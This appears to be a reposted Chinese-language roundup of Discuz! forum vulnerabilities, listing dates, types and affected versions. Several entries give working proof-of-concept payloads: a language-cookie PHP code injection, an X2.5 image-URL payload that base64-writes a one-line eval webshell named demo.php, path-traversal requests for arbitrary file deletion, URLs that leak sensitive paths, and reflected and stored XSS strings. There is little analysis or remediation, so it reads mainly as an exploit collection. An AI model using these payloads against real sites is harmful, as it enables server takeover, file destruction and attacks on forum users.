应用安全

Discuz ML! V3.X 代码注入

Date
2019

类型
代码注入导致RCE

影响范围
Discuz!ML v.3.4 、Discuz!ML v.3.2 、Discuz!ML v.3.3 product of codersclub.org

poc
_language=sc'.phpinfo().';

SSV-90861

Date:
2012

类型:
敏感信息泄露

影响范围:
DZ x2.5 

POC:
http://www.xx.xx/uc_server/control/admin/db.php http://www.xx.xx/source/plugin/myrepeats/table/table_myrepeats.php http://www.xx.xx/install/include/install_lang.php

Discuz! X2.5 远程代码执行

Date:
2012

类型:
RCE

前置条件:1).注册任意账户
(2).登陆用户,发表blog日志(注意是日志)
(3).添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}
(4).访问日志,论坛根目录下生成demo.php,一句发密码c

影响范围:
v2.5

Discuz!X2/2.5弱口令破解漏洞

Date:
2013

类型:
登录界面暴力破解

影响范围:
Discuz!X2/2.5

ssvid-93588

Date:
2014

类型:
任意文件删除

前置条件:
(1)登陆DZ前台
(2)请求:
home.php?mod=spacecp&ac=profile&op=base
POST birthprovince=../../../test.txt&profilesubmit=1&formhash=b644603b
修改成功之后出生地就会变为../../../test.txt

(3)构造请求向home.php?mod=spacecp&ac=profile&op=base上传文件(普通图片即可)

请求后文件被删除


影响范围:
version<=3.4

SSV-96608

Date:
2014.10

类型:
前台任意文件删除

影响范围:

 

SSV-89024

Date:
2015.1

类型:
Discuz X2.5 /source/class/class_image.php 命令执行漏洞

影响范围:
Discuz X2.5 

Discuz! X系列远程代码执行漏洞

Date:
2015.8

类型:
RCE + XML反序列化

前置条件:
访问:/api/uc.php
影响范围:

 

SSV-91183

Date:
2016.3

类型:
SSRF

影响范围:
Discuz! X2 X3

POC:
http://www.internetblog.cn/archives/6068.html?mip

 

CVE-2018-14729

Date:
2018.8

类型:
远程代码执行

前置条件:
登录后台

影响范围:
Discuz! 1.5-2.5
Discuz
Discuz!X ≤3.4 任意文件删除漏洞分析

Discuz!7.2/X1 第三方插件SQL注入及持久型XSS漏洞
SQL注入及跨站脚本漏洞。
moodwall.inc.php
发表心情处直接插入html代码
code 区域
"><script>alert(/xss/)</script>


Discuz! X1某页面存在XSS漏洞
简要描述:
页面对取到的参数没有过滤,直接echo到了html里
详细说明:
api/db/dbbak.php页面,对$apptype缺少必要的过滤,调用api_msg()函数时直接将$apptype echo到了html中。
漏洞证明:
http://**.**.**.**/api/db/dbbak.php?apptype=1%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3C%22
原文地址:https://www.cnblogs.com/AtesetEnginner/p/11739371.html